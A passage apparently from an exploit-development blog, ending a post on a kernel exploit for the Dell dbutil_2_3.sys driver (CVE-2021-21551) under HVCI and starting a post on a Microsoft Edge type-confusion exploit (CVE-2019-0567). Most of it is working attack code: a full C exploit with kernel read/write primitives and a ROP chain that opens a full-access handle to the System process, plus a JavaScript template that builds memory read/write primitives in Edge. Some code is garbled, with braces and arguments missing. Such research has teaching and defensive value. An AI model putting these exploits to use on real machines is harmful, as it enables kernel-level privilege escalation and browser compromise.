Again, we use getchar() to pause execution so we can inspect the thread before the process terminates. After executing the above exploit, we can see the ability to locate where nt!KiApcInterrupt + 0x328 exists on the stack.

We have now successfully located our target return address! Using our arbitrary write primitive, let’s overwrite the return address with 0x4141414141414141 - which should cause a system crash when our thread is resumed.

// Print update
printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

// Our ROP chain will start here
write64(inHandle, retAddr, 0x4141414141414141);

// Resume the thread to kick off execution

As we can see - our system has crashes and we control RIP! The system is attempting to return into the address 0x4141414141414141 - meaning we now control execution at the kernel level and we can now redirect execution into our ROP chain.

We also know the base address of ntoskrnl.exe, meaning we can resolve our needed ROP gadgets to arbitrarily invoke a kernel-mode API. Remember - just like DEP - ROP doesn’t actually execute unsigned code. We β€œresuse” existing signed code - which stays within the bounds of HVCI. Although it is a bit more arduous, we can still invoke arbitrary APIs - just like shellcode.

So let’s put together a proof-of-concept to arbitrarily call PsGetCurrentProcess - which should return a pointer to the EPROCESS structure associated with process housing the thread our ROP chain is executing in (our β€œdummy thread”). We also (for the purposes of showing it is possible) will save the result in a user-mode address so (theoretically) we could act on this object later.

Here is how our ROP chain will look.

This ROP chain places nt!PsGetCurrentProcess into the RAX register and then performs a jmp rax to invoke the function. This function doesn’t accept any parameters, and it returns a pointer to the current processes’ EPROCESS object. The calculation of this function’s address can be identified by calculating the offset from ntoskrnl.exe.

We can begin to debug the ROP chain by setting a breakpoint on the first pop rax gadget - which overwrites nt!KiApcInterrupt + 0x328.

After the pop rax occurs - nt!PsGetCurrentProcess is placed into RAX. The jmp rax gadget is dispatched - which invokes our call to nt!PsGetCurrentProcess (which is an extremely short function that only needs to index the KPRCB structure).

After completing the call to nt!PsGetCurrentProcess - we can see a user-mode address on the stack, which is placed into RCX and is used with a mov qword ptr [rcx], rax gadget.

This is a user-mode address supplied by us. Since nt!PsGetCurrentProcess returns a pointer to the current process (in the form of an EPROCESS object) - an attacker may want to preserve this value in user-mode in order to re-use the arbitrary write primitive and/or read primitive to further corrupt this object.

You may be thinking - what about Supervisor Mode Access Prevention (SMAP)? SMAP works similarly to SMEP - except SMAP doesn’t focus on code execution. SMAP prevents any kind of data access from ring 0 into ring 3 (such as copying a kernel-mode address into a user-mode address, or performing data access on a ring 3 page from ring 0). However, Windows only employs SMAP in certain situations - most notably when the processor servicing the data-operation is at an IRQL 2 and above. Since kernel-mode code runs at an IRQL of 0, this means SMAP isn’t β€œin play” - and therefore we are free to perform our data operation (saving the EPROCESS object into user-mode).

We have now completed the β€œmalicious” call and we have successfully invoked an arbitrary API of our choosing - without needing to detonate any unsigned-code. This means we have stepped around HVCI by staying compliant with it (e.g. we didn’t turn HVCI off - we just stayed within the guidelines of HVCI). kCFG was bypassed in this instance (we took control of RIP) by overwriting a return address, similarly to my last blog series on browser exploitation. Intel CET in the Windows kernel would have prevent this from happening.

Since we are using ROP, we need to restore our execution now. This is due to the fact we have completely altered the state of the CPU registers and we have corrupted the stack. Since we have only corrupted the β€œdummy thread” - we simply can invoke nt!ZwTerminateThread, while passing in the handle of the dummy thread, to tell the Windows OS to do this for us! Remember - the β€œdummy thread” is only being used for the arbitrary API call. There are still other threads (the main thread) which actually executes code within Project2.exe. Instead of manually trying to restore the state of the β€œdummy thread” - and avoid a system crash - we simply can just ask Windows to terminate the thread for us. This will β€œgracefully” exit the thread, without us needing to manually restore everything ourselves.

nt!ZwTerminateThread accepts two parameters. It is an undocumented function, but it actually receives the same parameters as prototyped by its user-mode β€œcousin”, TerminateThread.

All we need to pass to nt!ZwTerminateThread is a handle to the β€œdummy thread” (the thread we want to terminate) and an NTSTATUS code (we will just use STATUS_SUCCESS, which is a value of 0x00000000). So, as we know, our first parameter needs to go into the RCX register (the handle to the β€œdummy thread”).

As we can see above, our handle to the dummy thread will be placed into the RCX register. After this is placed into the RCX register, our exit code for our thread (STATUS_SUCCESS, or 0x00000000) is placed into RDX.

Now we have our parameters setup for nt!ZwTerminateThread. All that there is left now is to place nt!ZwTerminateThread into RAX and to jump to it.

You’ll notice, however, that instead of hitting the jmp rax gadget - we hit another ret after the ret issued from the pop rax ; ret gadget. Why is this? Take a closer look at the stack.

When the jmp rax instruction is dispatched (nt!_guard_retpoline_indeirect_rax+0x5e) - the stack is in a 16-byte alignment (a 16-byte alignment means that the last two digits of the virtual address, e.g. 0xffffc789dd19d160, which would be 60, end with a 0). Windows API calls sometimes use the XMM registers, under the hood, which allow memory operations to be facilitated in 16-byte intervals. This is why when Windows API calls are made, they must (usually) be made in 16-byte alignments! We use the β€œextra” ret gadget to make sure that when jmp nt!ZwTerminateThread dispatches, that the stack is properly aligned.

From here we can execute nt!ZwTerminateThread.

From here we can press g in the debugger - as the Windows OS will gracefully exit us from the thread!

As we can see, we have our EPROCESS object in the user-mode cmd.exe console! We can cross-reference this address in WinDbg to confirm.

Parsing this address as an EPROCESS object, we can confirm via the ImageFileName that this is the EPROCESS object associated with our current process! We have successfully executed a kernel-mode function call, from user-mode (via our vulnerability), while not triggering kCFG or HVCI!

Bonus ROP Chain

Our previous nt!PsGetCurrentProcess function call outlined how it is possible to call kernel-mode functions via an arbitrary read/write primitive, from user-mode, without triggering kCFG and HVCI. Although we won’t step through each gadget, here is a β€œbonus” ROP chain that you could use, for instance, to open up a PROCESS_ALL_ACCESS handle to the System process with HVCI and kCFG enabled (don’t forget to declare CLIENT_ID and OBJECT_ATTRIBUTE structures!).

	// Print update
	printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

	// Handle to the System process
	HANDLE systemprocHandle = NULL;

	CLIENT_ID clientId = { 0 };
	clientId.UniqueProcess = ULongToHandle(4);
	clientId.UniqueThread = NULL;

	OBJECT_ATTRIBUTES objAttrs = { 0 };

	// memset the buffer to 0
	memset(&objAttrs, 0, sizeof(objAttrs));

	// Set members
	objAttrs.ObjectName = NULL;
	objAttrs.Length = sizeof(objAttrs);
	// Begin ROP chain
	write64(inHandle, retAddr, ntBase + 0xa50296);				// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x8, &systemprocHandle);		// HANDLE (to receive System process handle)
	write64(inHandle, retAddr + 0x10, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x18, PROCESS_ALL_ACCESS);		// PROCESS_ALL_ACCESS
	write64(inHandle, retAddr + 0x20, ntBase + 0x2e8281);		// 0x1402e8281: pop r8 ; ret ; \x41\x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x28, &objAttrs);				// OBJECT_ATTRIBUTES
	write64(inHandle, retAddr + 0x30, ntBase + 0x42a123);		// 0x14042a123: pop r9 ; ret ; \x41\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x38, &clientId);				// CLIENT_ID
	write64(inHandle, retAddr + 0x40, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x48, ntBase + 0x413210);		// nt!ZwOpenProcess
	write64(inHandle, retAddr + 0x50, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	write64(inHandle, retAddr + 0x58, ntBase + 0xa50296);		// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x60, (ULONG64)dummyThread);	// HANDLE to the dummy thread
	write64(inHandle, retAddr + 0x68, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x70, 0x0000000000000000);		// Set exit code to STATUS_SUCCESS
	write64(inHandle, retAddr + 0x78, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x80, ntBase + 0x4137b0);		// nt!ZwTerminateThread
	write64(inHandle, retAddr + 0x88, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	// Resume the thread to kick off execution

	// Sleep Project2.exe for 1 second to allow the print update
	// to accurately display the System process handle

	// Print update
	printf("[+] System process HANDLE: 0x%p\n", systemprocHandle);

What’s nice about this technique is the fact that all parameters can be declared in user-mode using C - meaning we don’t have to manually construct our own structures, like a CLIENT_ID structure, in the .data section of a driver, for instance.


I would say that HVCI is easily one of the most powerful mitigations there is. As we saw - we actually didn’t β€œbypass” HVCI. HVCI mitigates unsigned-code execution in the VTL 0 kernel - which is something we weren’t able to achieve. However, Microsoft seems to be dependent on Kernel CET - and when you combine kCET, kCFG, and HVCI - only then do you get coverage against this technique.

HVCI is probably not only the most complex mitigation I have looked at, not only is it probably the best, but it taught me a ton about something I didn’t know (hypervisors). HVCI, even in this situation, did its job and everyone should please go and enable it! When coupled with CET and kCFG - it will make HVCI resilient against this sort of attack (just like how MBEC makes HVCI resilient against PTE modification).

It is possible to enable kCET if you have a supported processor - as in many cases it isn’t enabled by default. You can do this via regedit.exe by adding a value called Enabled - which you need to set to 1 (as a DWORD) - to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelShadowStacks key. Shoutout to my coworker Yarden Shafir for showing me this! Thanks for tuning in!

Here is the final code (nt!ZwOpenProcess).

Definitions in ntdll.h:

#include <Windows.h>
#include <Psapi.h>
#include <time.h>



typedef struct _SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 w018;
    WORD                 NameOffset;
    BYTE                 Name[256];

    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];

    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    void* Object;
    ACCESS_MASK GrantedAccess;

    ULONG NumberOfHandles;
    SYSTEM_HANDLE Handles[1];

// Prototype for ntdll!NtQuerySystemInformation
typedef NTSTATUS(WINAPI* NtQuerySystemInformation_t)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG           Length;
    HANDLE          RootDirectory;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
// CVE-2021-21551 (HVCI-compliant)
// Author: Connor McGarr (@33y0re)

#include "ntdll.h"
#include <stdio.h>

// Vulnerable IOCTL codes
#define IOCTL_READ_CODE 0x9B0C1EC4

// NTSTATUS codes
#define STATUS_SUCCESS 0x00000000

 * @brief Function to arbitrarily read kernel memory.
 * This function is able to take kernel mode memory, dereference it
 * and return it to user-mode.
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param WHAT - The kernel-mode memory to be dereferenced/read.
 * @return The dereferenced contents of the kernel-mode memory.

ULONG64 read64(HANDLE inHandle, ULONG64 WHAT)
	// Buffer to send to the driver (read primitive)
	ULONG64 inBuf[4] = { 0 };

	// Values to send
	ULONG64 one = 0x4141414141414141;
	ULONG64 two = WHAT;
	ULONG64 three = 0x0000000000000000;
	ULONG64 four = 0x0000000000000000;

	// Assign the values
	inBuf[0] = one;
	inBuf[1] = two;
	inBuf[2] = three;
	inBuf[3] = four;

	// Interact with the driver
	DWORD bytesReturned = 0;

	BOOL interact = DeviceIoControl(

	// Error handling
	if (!interact)
		// Bail out
		goto exit;

		// Return the QWORD
		return inBuf[3];

// Execution comes here if an error is encountered

	// Close the handle before exiting

	// Return an error
	return (ULONG64)1;

 * @brief Function used to arbitrarily write to kernel memory.
 * This function is able to take kernel mode memory
 * and write user-supplied data to said memory
 * 1 QWORD (ULONG64) at a time.
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param WHERE - The data the user wishes to write to kernel mode.
 * @param WHAT - The kernel-mode memory to be written to.
 * @return Result of the operation in the form of a boolean.
	// Buffer to send to the driver (write primitive)
	ULONG64 inBuf1[4] = { 0 };

	// Values to send
	ULONG64 one1 = 0x4141414141414141;
	ULONG64 two1 = WHERE;
	ULONG64 three1 = 0x0000000000000000;
	ULONG64 four1 = WHAT;

	// Assign the values
	inBuf1[0] = one1;
	inBuf1[1] = two1;
	inBuf1[2] = three1;
	inBuf1[3] = four1;

	// Interact with the driver
	DWORD bytesReturned1 = 0;

	BOOL interact = DeviceIoControl(

	// Error handling
	if (!interact)
		// Bail out
		goto exit;

		// Return TRUE
		return TRUE;

// Execution comes here if an error is encountered

	// Close the handle before exiting

	// Return FALSE (arbitrary write failed)
	return FALSE;

 * @brief Function to obtain a handle to the dbutil_2_3.sys driver.
 * @param Void.
 * @return The handle to the driver.
HANDLE getHandle(void)
	// Obtain a handle to the driver
	HANDLE driverHandle = CreateFileA(

	// Error handling
	if (driverHandle == INVALID_HANDLE_VALUE)
		// Bail out
		goto exit;
		// Return the driver handle
		return driverHandle;

// Execution comes here if an error is encountered

	// Return an invalid handle
	return (HANDLE)-1;

 * @brief Function used for LPTHREAD_START_ROUTINE
 * This function is used by the "dummy thread" as
 * the entry point. It isn't important, so we can
 * just make it "return"
 * @param Void.
 * @return Void.
void randomFunction(void)

 * @brief Function used to create a "dummy thread"
 * This function creates a "dummy thread" that is suspended.
 * This allows us to leak the kernel-mode stack of this thread.
 * @param Void.
 * @return A handle to the "dummy thread"
HANDLE createdummyThread(void)
	// Invoke CreateThread
	HANDLE dummyThread = CreateThread(

	// Error handling
	if (dummyThread == (HANDLE)-1)
		// Bail out
		goto exit;
		// Return the handle to the thread
		return dummyThread;

// Execution comes here if an error is encountered

	// Return an invalid handle
	return (HANDLE)-1;

 * @brief Function to resolve ntdll!NtQuerySystemInformation.
 * This function is used to resolve ntdll!NtQuerySystemInformation.
 * ntdll!NtQuerySystemInformation allows us to leak kernel-mode
 * memory, useful to our exploit, to user mode from a medium
 * integrity process.
 * @param Void.
 * @return A pointer to ntdll!NtQuerySystemInformation.

NtQuerySystemInformation_t resolveFunc(void)
	// Obtain a handle to ntdll.dll (where NtQuerySystemInformation lives)
	HMODULE ntdllHandle = GetModuleHandleW(L"ntdll.dll");

	// Error handling
	if (ntdllHandle == NULL)
		// Bail out
		goto exit;

	// Resolve ntdll!NtQuerySystemInformation
	NtQuerySystemInformation_t func = (NtQuerySystemInformation_t)GetProcAddress(

	// Error handling
	if (func == NULL)
		// Bail out
		goto exit;
		// Print update
		printf("[+] ntdll!NtQuerySystemInformation: 0x%p\n", func);

		// Return the address
		return func;

// Execution comes here if an error is encountered

	// Return an error
	return (NtQuerySystemInformation_t)1;

 * @brief Function used to leak the KTHREAD object
 * This function leverages NtQuerySystemInformation (by
 * calling resolveFunc() to get NtQuerySystemInformation's
 * location in memory) to leak the KTHREAD object associated
 * with our previously created "dummy thread"
 * @param dummythreadHandle - A handle to the "dummy thread"
 * @return A pointer to the KTHREAD object
ULONG64 leakKTHREAD(HANDLE dummythreadHandle)
	// Set the NtQuerySystemInformation return value to STATUS_INFO_LENGTH_MISMATCH for call to NtQuerySystemInformation

	// Resolve ntdll!NtQuerySystemInformation
	NtQuerySystemInformation_t NtQuerySystemInformation = resolveFunc();

	// Error handling
	if (NtQuerySystemInformation == (NtQuerySystemInformation_t)1)
		// Print update
		printf("[-] Error! Unable to resolve ntdll!NtQuerySystemInformation. Error: 0x%lx\n", GetLastError());

		// Bail out
		goto exit;

	// Set size to 1 and loop the call until we reach the needed size
	int size = 1;

	// Output size
	int outSize = 0;

	// Output buffer

	// Error handling
	if (out == NULL)
		// Bail out
		goto exit;

	// do/while to allocate enough memory necessary for NtQuerySystemInformation
		// Free the previous memory

		// Increment the size
		size = size * 2;

		// Allocate more memory with the updated size
		out = (PSYSTEM_HANDLE_INFORMATION)malloc(size);

		// Error handling
		if (out == NULL)
			// Bail out
			goto exit;

		// Invoke NtQuerySystemInformation
		retValue = NtQuerySystemInformation(
	} while (retValue == STATUS_INFO_LENGTH_MISMATCH);

	// Verify the NTSTATUS code which broke the loop is STATUS_SUCCESS
	if (retValue != STATUS_SUCCESS)
		// Is out == NULL? If so, malloc failed and we can't free this memory
		// If it is NOT NULL, we can assume this memory is allocated. Free
		// it accordingly
		if (out != NULL)
			// Free the memory

			// Bail out
			goto exit;

		// Bail out
		goto exit;
		// NtQuerySystemInformation should have succeeded
		// Parse all of the handles, find the current thread handle, and leak the corresponding object
		for (ULONG i = 0; i < out->NumberOfHandles; i++)
			// Store the current object's type number
			// Thread object = 0x8
			DWORD objectType = out->Handles[i].ObjectTypeNumber;

			// Are we dealing with a handle from the current process?
			if (out->Handles[i].ProcessId == GetCurrentProcessId())
				// Is the handle the handle of the "dummy" thread we created?
				if (dummythreadHandle == (HANDLE)out->Handles[i].Handle)
					// Grab the actual KTHREAD object corresponding to the current thread
					ULONG64 kthreadObject = (ULONG64)out->Handles[i].Object;

					// Free the memory

					// Return the KTHREAD object
					return kthreadObject;

// Execution comes here if an error is encountered

	// Close the handle to the "dummy thread"

	// Return the NTSTATUS error
	return (ULONG64)retValue;

 * @brief Function used resolve the base address of ntoskrnl.exe.
 * @param Void.
 * @return ntoskrnl.exe base
ULONG64 resolventBase(void)
	// Array to receive kernel-mode addresses
	LPVOID* lpImageBase = NULL;

	// Size of the input array
	DWORD cb = 0;

	// Size of the array output (all load addresses).
	DWORD lpcbNeeded = 0;

	// Invoke EnumDeviceDrivers (and have it fail)
	// to receive the needed size of lpImageBase

	// lpcbNeeded should contain needed size
	lpImageBase = (LPVOID*)malloc(lpcbNeeded);

	// Error handling
	if (lpImageBase == NULL)
		// Bail out
		goto exit;

	// Assign lpcbNeeded to cb (cb needs to be size of the lpImageBase
	// array).
	cb = lpcbNeeded;

	// Invoke EnumDeviceDrivers properly.
	BOOL getAddrs = EnumDeviceDrivers(

	// Error handling
	if (!getAddrs)
		// Bail out
		goto exit;

	// The first element of the array is ntoskrnl.exe.
	return (ULONG64)lpImageBase[0];

// Execution reaches here if an error occurs

	// Return an error.
	return (ULONG64)1;

 * @brief Function used write a ROP chain to the kernel-mode stack
 * This function takes the previously-leaked KTHREAD object of
 * our "dummy thread", extracts the StackBase member of the object
 * and writes the ROP chain to the kernel-mode stack leveraging the
 * write64() function.
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param dummyThread - A valid handle to our "dummy thread" in order to resume it.
 * @param KTHREAD - The KTHREAD object associated with the "dummy" thread.
 * @param ntBase - The base address of ntoskrnl.exe.
 * @return Result of the operation in the form of a boolean.
BOOL constructROPChain(HANDLE inHandle, HANDLE dummyThread, ULONG64 KTHREAD, ULONG64 ntBase)
	// KTHREAD.StackBase = KTHREAD + 0x38
	ULONG64 kthreadstackBase = KTHREAD + 0x38;

	// Dereference KTHREAD.StackBase to leak the stack
	ULONG64 stackBase = read64(inHandle, kthreadstackBase);

	// Error handling
	if (stackBase == (ULONG64)1)
		// Bail out
		goto exit;

	// Print update
	printf("[+] Leaked kernel-mode stack: 0x%llx\n", stackBase);

	// Variable to store our target return address for nt!KiApcInterrupt
	ULONG64 retAddr = 0;

	// Leverage the arbitrary write primitive to read the entire contents of the stack (seven pages = 0x7000)
	// 0x7000 isn't actually commited, so we start with 0x7000-0x8, since the stack grows towards the lower
	// addresses.
	for (int i = 0x8; i < 0x7000 - 0x8; i += 0x8)
		// Invoke read64() to dereference the stack
		ULONG64 value = read64(inHandle, stackBase - i);

		// Kernel-mode address?
		if ((value & 0xfffff00000000000) == 0xfffff00000000000)
			// nt!KiApcInterrupt+0x328?
			if (value == ntBase + 0x41b718)
				// Print update
				printf("[+] Leaked target return address of nt!KiApcInterrupt!\n");

				// Store the current value of stackBase - i, which is nt!KiApcInterrupt+0x328
				retAddr = stackBase - i;

				// Break the loop if we find our address

		// Reset the value
		value = 0;

	// Print update
	printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

	// Handle to the System process
	HANDLE systemprocHandle = NULL;

	CLIENT_ID clientId = { 0 };
	clientId.UniqueProcess = ULongToHandle(4);
	clientId.UniqueThread = NULL;

	OBJECT_ATTRIBUTES objAttrs = { 0 };

	// memset the buffer to 0
	memset(&objAttrs, 0, sizeof(objAttrs));

	// Set members
	objAttrs.ObjectName = NULL;
	objAttrs.Length = sizeof(objAttrs);
	// Begin ROP chain
	write64(inHandle, retAddr, ntBase + 0xa50296);				// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x8, &systemprocHandle);		// HANDLE (to receive System process handle)
	write64(inHandle, retAddr + 0x10, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x18, PROCESS_ALL_ACCESS);		// PROCESS_ALL_ACCESS
	write64(inHandle, retAddr + 0x20, ntBase + 0x2e8281);		// 0x1402e8281: pop r8 ; ret ; \x41\x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x28, &objAttrs);				// OBJECT_ATTRIBUTES
	write64(inHandle, retAddr + 0x30, ntBase + 0x42a123);		// 0x14042a123: pop r9 ; ret ; \x41\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x38, &clientId);				// CLIENT_ID
	write64(inHandle, retAddr + 0x40, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x48, ntBase + 0x413210);		// nt!ZwOpenProcess
	write64(inHandle, retAddr + 0x50, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	write64(inHandle, retAddr + 0x58, ntBase + 0xa50296);		// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x60, (ULONG64)dummyThread);	// HANDLE to the dummy thread
	write64(inHandle, retAddr + 0x68, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x70, 0x0000000000000000);		// Set exit code to STATUS_SUCCESS
	write64(inHandle, retAddr + 0x78, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x80, ntBase + 0x4137b0);		// nt!ZwTerminateThread
	write64(inHandle, retAddr + 0x88, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	// Resume the thread to kick off execution

	// Sleep Project2.ee for 1 second to allow the print update
	// to accurately display the System process handle

	// Print update
	printf("[+] System process HANDLE: 0x%p\n", systemprocHandle);

// Execution comes here if an error is encountered

	// Return the NTSTATUS error
	return (ULONG64)1;

 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
int main(void)
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	HANDLE driverHandle = getHandle();

	// Error handling
	if (driverHandle == (HANDLE)-1)
		// Print update
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx", GetLastError());

		// Bail out
		goto exit;

	// Print update
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	// Invoke getthreadHandle() to create our "dummy thread"
	HANDLE getthreadHandle = createdummyThread();

	// Error handling
	if (getthreadHandle == (HANDLE)-1)
		// Print update
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		// Bail out
		goto exit;

	// Print update
	printf("[+] Created the \"dummy thread\"!\n");

	// Invoke leakStack()
	ULONG64 kthread = leakKTHREAD(getthreadHandle);

	// Error handling (Negative value? NtQuerySystemInformation returns a negative NTSTATUS if it fails)
	if ((!kthread & 0x80000000) == 0x80000000)
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		// Bail out
		goto exit;

	// Error handling (kthread isn't negative - but is it a kernel-mode address?)
	else if ((!kthread & 0xffff00000000000) == 0xffff00000000000 || ((!kthread & 0xfffff00000000000) == 0xfffff00000000000))
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		// Bail out
		goto exit;

	// Print update
	printf("[+] \"Dummy thread\" KTHREAD object: 0x%llx\n", kthread);

	// Invoke resolventBase() to retrieve the load address of ntoskrnl.exe
	ULONG64 ntBase = resolventBase();

	// Error handling
	if (ntBase == (ULONG64)1)
		// Bail out
		goto exit;

	// Invoke constructROPChain() to build our ROP chain and kick off execution
	BOOL createROP = constructROPChain(driverHandle, getthreadHandle, kthread, ntBase);

	// Error handling
	if (!createROP)
		// Print update
		printf("[-] Error! Unable to construct the ROP chain. Error: 0x%lx\n", GetLastError());

		// Bail out
		goto exit;

// Execution comes here if an error is encountered

	// Return an error
	return 1;

Peace, love, and positivity :-).

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 3)

7 April 2022 at 00:00


In part one of this blog series on β€œmodern” browser exploitation, targeting Windows, we took a look at how JavaScript manages objects in memory via the Chakra/ChakraCore JavaScript engine and saw how type confusion vulnerabilities arise. In part two we took a look at Chakra/ChakraCore exploit primitives and turning our type confusion proof-of-concept into a working exploit on ChakraCore, while dealing with ASLR, DEP, and CFG. In part three, this post, we will close out this series by making a few minor tweaks to our exploit primitives to go from ChakraCore to Chakra (the closed-source version of ChakraCore which Microsoft Edge runs on in various versions of Windows 10). After porting our exploit primitives to Edge, we will then gain full code execution while bypassing Arbitrary Code Guard (ACG), Code Integrity Guard (CIG), and other minor mitigations in Edge, most notably β€œno child processes” in Edge. The final result will be a working exploit that can gain code execution with ASLR, DEP, CFG, ACG, CIG, and other mitigations enabled.

From ChakraCore to Chakra

Since we already have a working exploit for ChakraCore, we now need to port it to Edge. As we know, Chakra (Edge) is the β€œclosed-source” variant of ChakraCore. There are not many differences between how our exploits will look (in terms of exploit primitives). The only thing we need to do is update a few of the offsets from our ChakraCore exploit to be compliant with the version of Edge we are exploiting. Again, as mentioned in part one, we will be using an UNPATCHED version of Windows 10 1703 (RS2). Below is an output of winver.exe, which shows the build number (15063.0) we are using. The version of Edge we are using has no patches and no service packs installed.

Moving on, below you can find the code that we will be using as a template for our exploitation. We will name this file exploit.html and save it to our Desktop (feel free to save it anywhere you would like).

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

